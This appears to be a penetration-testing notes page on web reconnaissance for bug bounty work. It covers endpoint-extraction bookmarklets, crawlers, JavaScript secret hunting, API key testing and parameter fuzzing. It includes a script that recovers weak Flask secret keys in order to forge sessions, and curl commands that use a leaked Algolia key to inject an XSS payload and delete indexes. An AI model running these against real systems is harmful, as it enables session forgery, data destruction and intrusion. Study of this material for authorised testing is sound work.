{% embed url="<https://anmolksachan.medium.com/unlock-hidden-backups-with-waybackupfinder-py-7b98041a82d9>" %}

Look for metadata

## Extract URLs and paths from web pages

### Manually

{% embed url="<https://x.com/renniepak/status/1602620834463588352>" %}

{% embed url="<https://0-a.nl/jsendpoints.txt>" %}

```
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
```

Open the Console (ctrl + shift + i), type `allow pasting` when the browser asks (French UI: "autoriser le collage"), paste the JS code, or save it as a bookmark and click it

<figure><img src="/files/wP6ZlKefzgqGCiZRjsHO" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/mE4hHez7GNseqItrnpge" alt=""><figcaption></figcaption></figure>

Source: NahamCon2024: .js Files Are Your Friends | @zseano <https://www.youtube.com/watch?v=fQoxjBwQZUA>

Extensions to run Javascript - No need to use the console

{% embed url="<https://addons.mozilla.org/en-US/firefox/addon/javascript/>" %}

{% embed url="<https://chromewebstore.google.com/detail/run-javascript/lmilalhkkdhfieeienjbiicclobibjao>" %}

Code to get URLs and unhide elements - Credits: `@coffinxp`

```
javascript:(function(){if(document.getElementById('lostsec-scanner'))return;let e=!1,t=[],n=document.createElement('div');n.id='lostsec-scanner',n.style='position:fixed;bottom:0;left:0;width:100%;height:350px;background:#181818;color:#00bcd4;z-index:999999;padding:20px;font-family:monospace;box-shadow:0 -2px 10px rgba(0,0,0,0.7);border-top:2px solid #00bcd4;overflow:hidden;';let o=document.createElement('div');o.style='position:absolute;top:0;left:0;width:100%;height:10px;background:#222;cursor:ns-resize;',n.appendChild(o);let i=!1,a=0,l=0;o.addEventListener('mousedown',r=>{i=!0,a=r.clientY,l=n.offsetHeight,r.preventDefault()});function d(r){if(i){let d=l-(r.clientY-a);d=Math.max(200,Math.min(d,window.innerHeight*.9)),n.style.height=d+'px';let s=document.getElementById('results-wrapper');s&&(s.style.maxHeight=d-140+'px')}}function c(){i=!1}document.addEventListener('mousemove',d),document.addEventListener('mouseup',c);let s=document.createElement('div');s.textContent='❌',s.style='position:absolute;top:10px;right:20px;font-size:18px;color:#ff4081;cursor:pointer;';function u(){e=!0,document.removeEventListener('mousemove',d),document.removeEventListener('mouseup',c),document.removeEventListener('keydown',f),n.remove(),t.forEach(e=>e.abort())}s.onclick=u,n.appendChild(s);let m=document.createElement('h3');m.textContent='🔍 Lostsec Uncover',m.style='margin:10px 0;color:#00bcd4;',n.appendChild(m);let v=document.createElement('input');v.placeholder='Search URLs...',v.style='width:100%;padding:6px;margin-bottom:10px;border-radius:4px;border:none;font-size:14px;outline:none;background:#222;color:#00bcd4;',n.appendChild(v);let y=document.createElement('div');y.style='margin-bottom:10px;display:flex;gap:10px;flex-wrap:wrap;';let h=document.createElement('button');h.textContent='📋 Copy All',h.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';let g=document.createElement('button');g.textContent='⬇️ Export .txt',g.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';let z=document.createElement('button');z.textContent='🪄 Unhide Elements',z.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';z.onclick=()=>{document.querySelectorAll('[disabled],[readonly]').forEach(el=>{el.removeAttribute('disabled');el.removeAttribute('readonly');});document.querySelectorAll('[style*="display: none"],.hidden').forEach(el=>{el.style.display='block';});document.querySelectorAll('[style*="pointer-events: none"],.grayed').forEach(el=>{el.style.pointerEvents='auto';el.style.opacity='1';});alert('✅ Disabled, readonly, and hidden elements are now active!');};let p=document.createElement('label');p.style='display:flex;align-items:center;gap:5px;color:#00bcd4;font-size:14px;cursor:pointer;';let b=document.createElement('input');b.type='checkbox',p.appendChild(b),p.appendChild(document.createTextNode('Domain only')),y.appendChild(h),y.appendChild(g),y.appendChild(z),y.appendChild(p),n.appendChild(y);let w=document.createElement('div');w.id='results',w.style='margin-top:10px;color:#00bcd4;';let k=document.createElement('div');k.id='results-wrapper',k.style='background:#222;padding:10px;border-radius:5px;max-height:180px;overflow:auto;margin-top:10px;',n.appendChild(w),n.appendChild(k),document.body.appendChild(n);let x=new URL(window.location.href).hostname;function f(r){'Escape'===r.key&&u()}document.addEventListener('keydown',f);let totalScripts=0,processedScripts=0,foundSet=new Set,domUrls=[];function updateProgress(){w.innerHTML=`<div style="margin:10px 0;color:#00bcd4">Scanning... (${processedScripts}/${totalScripts} scripts processed)</div>`}function updateResults(){let arr=[...new Set([...domUrls,...foundSet])];C=arr,T(arr)}async function scanExternalScripts(){let scripts=document.getElementsByTagName('script');totalScripts=Array.from(scripts).filter(s=>s.src).length,processedScripts=0;let regex=/["'`]\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=["'`])/g,promises=[];for(let s of scripts)if(s.src){let ctrl=new AbortController;t.push(ctrl),promises.push(fetch(s.src,{signal:ctrl.signal}).then(r=>r.text()).then(text=>{if(e)return;let matches=text.matchAll(regex);for(let m of matches)foundSet.add(m[0]);processedScripts++,updateProgress(),updateResults()}).catch(err=>{processedScripts++,updateProgress();'AbortError'!==err.name&&console.error(err)}))}await Promise.all(promises)}function L(){let e=new Set;document.querySelectorAll('a,script,img,link,form').forEach(t=>{t.href&&e.add(t.href),t.src&&e.add(t.src),t.action&&e.add(t.action)});let n=document.documentElement.innerHTML,o=/(?:url\(|href=|src=|action=|url:|endpoint:|path:|route:)\s*["']?([^"')\s>]+)(?=["'>\s])/gi,i;for(;null!==(i=o.exec(n));)i[1]&&!i[1].startsWith('data:')&&e.add(i[1]);(n.match(/"[^"]*"|'[^']*'/g)||[]).forEach(t=>{let n=/(?:\/[a-zA-Z0-9_-]+)+(?:\.[a-zA-Z0-9]+)?/g,o=t.match(n)||[];o.forEach(t=>e.add(t))}),performance.getEntriesByType('resource').forEach(t=>e.add(t.name));return Array.from(e).sort()}function T(n){k.innerHTML='';let o=n.filter(t=>{if(b.checked&&!t.includes(x))return!1;let n=v.value.toLowerCase();return!(n&&!t.toLowerCase().includes(n))});o.forEach(e=>{let t=document.createElement('div');t.style='color:#fff;margin:4px 0;padding:5px;background:#333;border-radius:3px;word-break:break-all;',t.textContent=e,k.appendChild(t)})}function U(e){return e.filter(t=>{if(b.checked&&!t.includes(x))return!1;let n=v.value.toLowerCase();return!(n&&!t.toLowerCase().includes(n))})}let C=[];v.addEventListener('input',()=>T(C)),b.addEventListener('change',()=>T(C)),h.addEventListener('click',()=>{let e=U(C);navigator.clipboard.writeText(e.join('\n')).then(()=>alert('✅ URLs copied!'))}),g.addEventListener('click',()=>{let e=U(C),t=new Blob([e.join('\n')]),n=document.createElement('a');n.href=URL.createObjectURL(t),n.download='lostsec_urls.txt',n.click()}),function init(){w.textContent='Scanning...';domUrls=L(),updateResults(),scanExternalScripts().then(()=>{if(e)return;w.innerHTML=`<div style="margin:10px 0;color:#00bcd4">✅ Scan complete! Found ${C.length} unique URLs & Endpoints on ${x}</div>`,T(C)}).catch(n=>{if(e)return;console.error(n),w.textContent='❌ Error during scan. Check console for details.'})}();})();
```

### [Crawling](#crawling-1)

### Cariddi

{% embed url="<https://github.com/edoardottt/cariddi>" %}

```
$ echo https://target.com/ | cariddi
$ cat target.txt | cariddi
```

### Gourlex

```
gourlex -t domain.com
```

{% embed url="<https://github.com/trap-bytes/gourlex>" %}

### xnLinkFinder

{% embed url="<https://github.com/xnl-h4ck3r/xnLinkFinder>" %}

```
xnLinkFinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d 2 -v
```

Command breakdown:

```
-i bugcrowd.com               → Target (domain, URL, file or directory of responses)
-sp https://www.bugcrowd.com  → Scope prefix, prepended to relative links
-sf "bugcrowd.*"              → Scope filter, only keep links matching this
-d 2                          → Crawl depth
-v                            → Verbose output
```

### Hakrawler

{% embed url="<https://github.com/hakluke/hakrawler>" %}

```
echo https://google.com | hakrawler
```

### Waybackurls

{% embed url="<https://github.com/tomnomnom/waybackurls>" %}

### Katana & Urlfinder

```
katana -u https://tesla.com
```

{% embed url="<https://github.com/projectdiscovery/katana>" %}

```
urlfinder -d tesla.com
```

{% embed url="<https://github.com/projectdiscovery/urlfinder>" %}

### GetAllURL - gau

{% embed url="<https://github.com/lc/gau>" %}

```
gau https://target.com
```

### LinkFinder

{% embed url="<https://github.com/GerbenJavado/LinkFinder>" %}

```
python3 linkfinder.py -i https://example.com/app.js
```

```
$ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli
```

### GoLinkFinder

Faster than LinkFinder

{% embed url="<https://github.com/0xsha/GoLinkFinder>" %}

```
golinkfinder -file js_files.txt -output results.json
```

### LazyEgg

{% embed url="<https://github.com/schooldropout1337/lazyegg>" %}

### ReconSpider

See [Fingerprinting / Crawling](/0xss0rz/pentest/recon/fingerprinting-crawling.md)

## BadSecrets - Cookies

{% embed url="<https://github.com/blacklanternsecurity/badsecrets/tree/main>" %}

| Name                       | Description                                                                                                                            |
| -------------------------- | -------------------------------------------------------------------------------------------------------------------------------------- |
| ASPNET\_Viewstate          | Checks the viewstate/generator against a list of known machine keys.                                                                   |
| Telerik\_HashKey           | Checks patched (2017+) versions of Telerik UI for a known Telerik.Upload.ConfigurationHashKey                                          |
| Telerik\_EncryptionKey     | Checks patched (2017+) versions of Telerik UI for a known Telerik.Web.UI.DialogParametersEncryptionKey                                 |
| Flask\_SignedCookies       | Checks for weak Flask cookie signing password. Wrapper for [flask-unsign](https://github.com/Paradoxis/Flask-Unsign)                   |
| Peoplesoft\_PSToken        | Can check a peoplesoft PS\_TOKEN for a bad/weak signing password                                                                       |
| Django\_SignedCookies      | Checks django's session cookies (when in signed\_cookie mode) for known django secret\_key                                             |
| Rails\_SecretKeyBase       | Checks Ruby on Rails signed or encrypted session cookies (from multiple major releases) for known secret\_key\_base                    |
| Generic\_JWT               | Checks JWTs for known HMAC secrets or RSA private keys                                                                                 |
| Jsf\_viewstate             | Checks both Mojarra and MyFaces implementations of JavaServer Faces (JSF) for use of known or weak secret keys                         |
| Symfony\_SignedURL         | Checks symfony "\_fragment" urls for known HMAC key. Operates on Full URL, including hash                                              |
| Express\_SignedCookies\_ES | Checks express.js express-session middleware for signed cookies and session cookies for known 'session secret'                         |
| Express\_SignedCookies\_CS | Checks express.js cookie-session middleware for signed cookies and session cookies for known secret                                    |
| Laravel\_SignedCookies     | Checks 'laravel\_session' cookies for known laravel 'APP\_KEY'                                                                         |
| ASPNET\_Vstate             | Checks for a once popular custom compressed Viewstate [code snippet](https://blog.sorcery.ie/posts/higherlogic_rce/) vulnerable to RCE |
| Rack2\_SignedCookies       | Checks Rack 2.x signed cookies for known secret keys                                                                                   |
| Yii2\_SignedCookies        | Checks Yii2 framework signed cookies for known cookie validation keys                                                                  |
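What "checks for a known secret" means in practice, using the Flask row of the table: the `session` cookie is `payload.timestamp.signature`, where `signature = base64url(HMAC-SHA1(K, payload + "." + timestamp))` and `K = HMAC-SHA1(secret_key, b"cookie-session")`, the itsdangerous key derivation Flask uses. Trying each candidate secret and comparing the recomputed signature is exactly the wordlist attack flask-unsign and BadSecrets automate. The block below is an added example, not from the original notes or from either tool; the cookie is minted here with a deliberately weak secret so the brute-force can run offline.

```python
"""Recover a Flask SECRET_KEY from a session cookie by wordlist (added example; sample cookie is constructed)."""
import base64
import hashlib
import hmac
import time

SALT = b"cookie-session"   # Flask's SecureCookieSessionInterface salt

def _b64(raw):
    """itsdangerous base64: urlsafe, no padding."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def flask_signature(secret, signed_value):
    """base64url(HMAC-SHA1(derive(secret), signed_value)), derive = HMAC-SHA1(secret, salt)."""
    key = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return _b64(hmac.new(key, signed_value.encode(), hashlib.sha1).digest())

def sign_session(secret, payload_json, ts=None):
    """Mint a cookie the way Flask would (payload_json is the serialised session dict)."""
    ts = int(time.time()) if ts is None else ts
    ts_b64 = _b64(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed = f"{_b64(payload_json.encode())}.{ts_b64}"
    return f"{signed}.{flask_signature(secret, signed)}"

def find_secret(cookie, candidates):
    """The candidate whose derived key validates the cookie's signature, or None."""
    signed, _, sig = cookie.rpartition(".")
    for secret in candidates:
        if hmac.compare_digest(flask_signature(secret, signed), sig):
            return secret
    return None

# Constructed sample: a session cookie minted with a weak secret.
WEAK_SECRET = "changeme"
SAMPLE_COOKIE = sign_session(WEAK_SECRET, '{"user":"admin"}', ts=1700000000)
WORDLIST = ["secret", "password", "flask", "changeme", "supersecret"]

if __name__ == "__main__":
    print("cookie:", SAMPLE_COOKIE)
    print("secret:", find_secret(SAMPLE_COOKIE, WORDLIST))
```

Once `find_secret()` returns a hit, `sign_session(secret, '{"user":"admin"}')` forges any session you like; a payload that starts with `.` is zlib-compressed by Flask, which changes nothing for the signature check. The other rows of the table are the same idea with a different derivation (Django uses HMAC-SHA256 with a `django.contrib.sessions` salt, Rails derives `secret_key_base` with PBKDF2).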

## Secrets in Response

Detects sensitive information leaks in HTTP responses using custom regex-based signatures

{% embed url="<https://github.com/Ahmex000/Y-Leak-Scanner.go?s=03>" %}

## Metadata

{% content-ref url="/pages/PzxWrp79GI8EdtkRI6p9" %}
[Metadata and Hidden infos](/0xss0rz/pentest/recon/osint/metadata-and-hidden-infos.md)
{% endcontent-ref %}

## JS Files

### Sensitive JS Files

```
ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10
```

{% embed url="<https://github.com/0xSs0rZ/payloads/blob/main/senstivejs.txt>" %}

```
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js 
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js 
/js/policies.js
/js/permissions.js 
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
```

### Burp

<figure><img src="/files/8cZNAWophMffXz8LChhu" alt=""><figcaption></figcaption></figure>

Source: NahamCon2024: *.js Files Are Your Friends* | @zseano <https://www.youtube.com/watch?v=fQoxjBwQZUA>

{% embed url="<https://kpwn.de/2023/05/javascript-analysis-for-pentesters/?s=03>" %}

<figure><img src="/files/6ZiQP5XTvsbFWFIkPvPc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vGn9zIeR8rH6m1lnNn8U" alt=""><figcaption></figcaption></figure>

```
wget -i urls.txt
```

Detect secrets

```
./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"
```

Burp Extension

{% embed url="<https://portswigger.net/bappstore/514b964549874209b3a4f70ec54e915d>" %}

Code Analysis

{% content-ref url="/pages/aOTJAYAkbZbDV7Iij03k" %}
[Code Analysis](/0xss0rz/pentest/code-analysis.md)
{% endcontent-ref %}

```
semgrep scan --config auto
```

<figure><img src="/files/YxWdrt7N7RiqZ1X5Ghlu" alt=""><figcaption></figcaption></figure>

### JSFScan.sh

```
1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.
```

{% embed url="<https://github.com/KathanP19/JSFScan.sh>" %}

```
bash JSFScan.sh -l target.txt --all -r -o outputdir
```

{% embed url="<https://www.youtube.com/watch?v=Z13dnarKF-w>" %}

### Morgan

Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites

{% embed url="<https://github.com/VFA250/Morgan>" %}

### Gouge - Burp extension to extract URLs which are seen in JS files

{% embed url="<https://github.com/mqst/gouge>" %}

### GetJS

{% embed url="<https://github.com/003random/getJS>" %}

### JSHunter

Endpoint Extraction and Sensitive Data Detection

```
cat urls.txt | grep "\.js" | jshunter
```

{% embed url="<https://github.com/cc1a2b/jshunter>" %}

### Javascript Deobfuscator

{% embed url="<https://github.com/ben-sb/javascript-deobfuscator>" %}

Online

{% embed url="<https://deobfuscate.io/>" %}

## API Endpoint - Burp History

{% embed url="<https://github.com/s0md3v/dump/tree/master/json2paths>" %}

<figure><img src="/files/ZYna90xhiYkeMSaBNIz3" alt=""><figcaption></figcaption></figure>

## API Endpoint in JS File

```
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
```
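The grep above finds relative endpoints; the next thing to pull from the same files is credentials. The block below is an added example, not from the original notes or any of the tools listed: it applies the same endpoint regex, then a few signature patterns (AWS access key id, Google API key, JWT, generic `api_key`/`secret`/`token`/`password` assignments) with a Shannon-entropy filter so placeholders like `YOUR_API_KEY_HERE` are dropped. The signatures are illustrative, not exhaustive; the JS sample is constructed for the demo and every key in it is fake.

```python
"""Endpoints + likely secrets from JavaScript with an entropy filter (added example; sample JS is constructed)."""
import math
import re

ENDPOINT = re.compile(r"""(?<=["'`])/[a-zA-Z0-9_?&=/\-#.]*(?=["'`])""")
SIGNATURES = {
    "aws_access_key_id":  re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "google_api_key":     re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "jwt":                re.compile(r"\beyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]*"),
    "generic_assignment": re.compile(
        r"""(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[:=]\s*["']([^"']{12,})["']"""),
}
MIN_ENTROPY = 3.5  # bits/char: random keys sit above 4, words and placeholders below

def shannon_entropy(s):
    if not s:
        return 0.0
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

def extract_endpoints(js):
    """Unique relative paths in order of first appearance (bare '/' dropped)."""
    seen, out = set(), []
    for m in ENDPOINT.finditer(js):
        p = m.group(0)
        if p == "/" or p in seen:
            continue
        seen.add(p)
        out.append(p)
    return out

def extract_secrets(js, min_entropy=MIN_ENTROPY):
    """[(kind, value)] for every signature hit; generic assignments must also
    clear the entropy bar, the structured formats are specific enough on their own."""
    hits = []
    for kind, rx in SIGNATURES.items():
        for m in rx.finditer(js):
            value = m.group(1) if rx.groups else m.group(0)
            if kind == "generic_assignment" and shannon_entropy(value) < min_entropy:
                continue
            hits.append((kind, value))
    return hits

# Constructed sample; every credential below is made up.
SAMPLE_JS = r"""
const API = "/api/v2/users"; fetch(`/api/v2/users/${id}/roles`);
var cfg = {endpoint: '/internal/admin/export?format=csv', apiKey: "YOUR_API_KEY_HERE"};
const maps = "AIzaSyD-EXAMPLE000000000000000000000000";
axios.defaults.headers.common["Authorization"] = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.abc-DEF_123";
const secret = "xk9Q2vL8pT4mR1wZ7nB3cY";
const s3 = { accessKeyId: "AKIAIOSFODNN7EXAMPLE" };
"""

if __name__ == "__main__":
    import sys
    js = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JS
    for p in extract_endpoints(js):
        print("endpoint", p)
    for kind, value in extract_secrets(js):
        print(kind, value)
```

Note what the endpoint regex misses: the template literal `` `/api/v2/users/${id}/roles` `` is not matched because `$` breaks the character class, so run the file through a proper JS-aware extractor (jsluice, xnLinkFinder) as well. Anything the secret pass returns goes straight to the key-testing section below.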

### JSNinja

{% embed url="<https://github.com/iamunixtz/JSNinja>" %}

### JS Link Finder

{% embed url="<https://portswigger.net/bappstore/0e61c786db0c4ac787a08c4516d52ccf>" %}

### Jsluice

{% embed url="<https://github.com/BishopFox/jsluice>" %}

{% embed url="<https://github.com/0x999-x/jsluicepp>" %}

{% content-ref url="/pages/XFMFG4djX40RJT1RB02r" %}
[API](/0xss0rz/pentest/api.md)
{% endcontent-ref %}

## Sensitive data in JS Files

Top 25 JavaScript path files used to store sensitive information: same list as `senstivejs.txt` under [Sensitive JS Files](#sensitive-js-files) above.

{% embed url="<https://github.com/BishopFox/jsluice>" %}

{% embed url="<https://github.com/iamunixtz/JSNinja>" %}

<figure><img src="/files/bggugxSlLZY7hmZ6RoEr" alt=""><figcaption></figcaption></figure>

{% content-ref url="/pages/sMiDxTVbbdYwwlcTWYY3" %}
[Sensitive Data (API Key, JWT token, etc.) Exposed](/0xss0rz/pentest/api/sensitive-data-api-key-jwt-token-etc.-exposed.md)
{% endcontent-ref %}

### JS Miner - Burp Extension

### X-Keys - Burp Extension

{% embed url="<https://github.com/vsec7/BurpSuite-Xkeys>" %}

### jsluice++ - Burp Extension

{% embed url="<https://github.com/0x999-x/jsluicepp>" %}

<figure><img src="/files/4btCpM5aHlxeXJiy8RPs" alt=""><figcaption></figcaption></figure>

### SecretFinder

{% embed url="<https://github.com/m4ll0k/SecretFinder>" %}

### JS-Snitch

{% embed url="<https://github.com/vavkamil/js-snitch>" %}

### Mantra

{% embed url="<https://github.com/MrEmpy/mantra>" %}

## Testing API Key

{% embed url="<https://github.com/streaak/keyhacks>" %}

### Google API Key

For years, leaked Google API keys (AIza...) had little to no real-world impact.\
Recently, however, many of them unexpectedly gained access to **Google Gemini**.

```
curl "https://generativelanguage.googleapis.com/v1/models?key=YOUR_KEY_HERE"
```

### Google Maps API Key

{% embed url="<https://github.com/ozguralp/gmapsapiscanner/>" %}

### Algolia API Key

Tool

{% embed url="<https://github.com/Suryesh/Algopwn>" %}

Manual Testing

{% embed url="<https://www.secjuice.com/api-misconfiguration-data-breach/>" %}

{% embed url="<https://github.com/streaak/keyhacks#Algolia-API-key>" %}

{% embed url="<https://suryesh92.medium.com/algolia-api-key-exploitation-leads-to-1000-bounty-p2-on-private-program-2e147f052ff0>" %}

Check ACL:

```
https://APPID-dsn.algolia.net/1/keys/APIKEY?x-algolia-application-id=APPID&x-algolia-api-key=APIKEY
```

The most damaging permissions are:

* **addObject**: Allows adding/updating an object in the index (copying/moving indices is also allowed with this permission).
* **deleteObject**: Allows deleting an existing object.
* **deleteIndex**: Allows deleting an index (this breaks search completely).
* **editSettings**: Allows changing index settings; this also allows running JavaScript when the search is used.
* **listIndexes**: Allows listing all accessible indices.
* **logs**: Allows viewing the search logs, which can include IP addresses and sensitive cookies.
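A small ACL audit for the "Check ACL" call above, added here as an example (not code from the linked tools or from Algolia): it parses the JSON returned for a key, flags the permissions listed above, and reports whether the key is search-only, which is what a key shipped in a front-end bundle should be. The sample response, the field names it reads (`acl`, `indexes`) and the `fetch_key_acl` helper are this example's assumptions.

```python
import json
import urllib.request

# Permissions the page lists as most damaging on a key exposed client-side.
DANGEROUS_ACL = {
    "addObject": "can add/update records (and copy/move indices)",
    "deleteObject": "can delete records",
    "deleteIndex": "can delete whole indices (breaks search)",
    "editSettings": "can change index settings, incl. highlight tags rendered into the page",
    "listIndexes": "can enumerate every accessible index",
    "logs": "can read search logs (IP addresses, possibly cookies)",
}

# Constructed example of a GET /1/keys/{key} response; not from a real app.
SAMPLE_KEY_RESPONSE = json.dumps({
    "value": "EXAMPLE_SEARCH_KEY",
    "acl": ["search", "listIndexes", "editSettings"],
    "indexes": ["*"],
    "description": "Frontend key",
})


def assess_key_acl(key_json: str) -> dict:
    """Split a key's ACL into findings; a browser key should carry only "search"."""
    info = json.loads(key_json)
    acl = info.get("acl", [])
    findings = {perm: DANGEROUS_ACL[perm] for perm in acl if perm in DANGEROUS_ACL}
    return {
        "indexes": info.get("indexes", []),   # "*" means every index
        "dangerous": findings,
        "search_only": acl == ["search"],
    }


def fetch_key_acl(app_id: str, api_key: str) -> str:
    """Fetch the key's own description via the ACL endpoint shown above (network)."""
    url = (f"https://{app_id}-dsn.algolia.net/1/keys/{api_key}"
           f"?x-algolia-application-id={app_id}&x-algolia-api-key={api_key}")
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    report = assess_key_acl(SAMPLE_KEY_RESPONSE)
    print("search-only:", report["search_only"], "| indexes:", report["indexes"])
    for perm, why in report["dangerous"].items():
        print(f"  {perm}: {why}")
```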

Abuse editSettings to put an XSS payload:

```
curl --request PUT \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'
```

List indexes

```
curl -X GET \
  "https://{appID}-dsn.algolia.net/1/indexes/" \
  -H "X-Algolia-API-Key: {api-key}" \
  -H "X-Algolia-Application-Id: {appID}"
```

Retrieve/read the data of a resource from the server:

* settings

```
curl --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>'
```

* Specific index

```
curl -X GET \
  "https://{appID}-dsn.algolia.net/1/indexes/{index_name}" \
  -H "X-Algolia-API-Key: {apikey}" \
  -H "X-Algolia-Application-Id: {appID}"
```

Update a resource on the server.

```
curl -X PATCH \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "This is hacked"}'
```

Delete Index - **DON'T DO THIS ON PRODUCTION ENVIRONMENT**

```
curl -X DELETE \
  "https://{appID}-dsn.algolia.net/1/indexes/Index_name?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}"
```

## Hidden Parameter

This useful option in Burp Suite makes every hidden input field (often a reference to a hidden parameter) visible in the rendered response.

Proxy Settings >>> Response modification rules >>> Unhide hidden form fields

<figure><img src="/files/sqbYmc45IrnAodofcJKJ" alt=""><figcaption></figcaption></figure>

## Parameters fuzzing

```
debug=true
test=1
admin=1
isAdmin=true
isPremium=true
superuser=1
role=user → flip to admin
uid=42
userid=42
account=42
profile=42
ref=partner → flip to internal
partnerId=1
```

### Burp - Param Miner

Right-click → Extensions → Param Miner → Guess params → Guess GET parameters.

<figure><img src="/files/qIu1bWqu3Jl8L8w0FvUu" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/DWc3ZIs4wv8swEefaBb6" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/RTXDQaotUuKK9SZ4dOcC" alt=""><figcaption></figcaption></figure>

### Burp - GAP

GetAllParams

{% embed url="<https://github.com/xnl-h4ck3r/GAP-Burp-Extension>" %}

### x8

Hidden parameter discovery

{% embed url="<https://github.com/Sh1Yo/x8>" %}

### Arjun

{% embed url="<https://github.com/s0md3v/Arjun>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/hacker-tools-arjun-the-parameter-discovery-tool>" %}

```
$ python3 /opt/Arjun/arjun.py -u http://target_address.com

$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json
```

If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:

```
$ python3 /opt/Arjun/arjun.py -i burp_targets.txt
```

### Paramhunter

{% embed url="<https://github.com/nullenc0de/paramhunter>" %}

## Wordlists

{% hint style="success" %}
*Try `/usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt` first, then* [*https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt*](https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt)
{% endhint %}

{% content-ref url="/pages/uDePbcQDhOjtjRKV8h1f" %}
[Fuzzing](/0xss0rz/pentest/web-attacks/fuzzing.md)
{% endcontent-ref %}

{% embed url="<https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt?s=03>" %}

{% embed url="<https://github.com/p0dalirius/webapp-wordlists>" %}

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists>" %}

* dirb lists
* <https://wordlists.assetnote.io/>
* SecLists: <https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content>
* BugBounty All Fuzz: <https://raw.githubusercontent.com/Karanxa/Bug-Bounty-Wordlists/refs/heads/main/all_fuzz.txt>
* Common extensions: `raft-[ small | medium | large ]-extensions.txt` from SecLists Web-Content
* Create wordlist - CeWL

```shell-session
cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10
```

### Fuzz using different HTTP methods

```
ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD
```

### Admin interfaces

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/admin.txt>" %}

### Backups

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/backup_files_only.txt>" %}

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/backup_files_with_path.txt>" %}

### Config files

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/config.txt>" %}

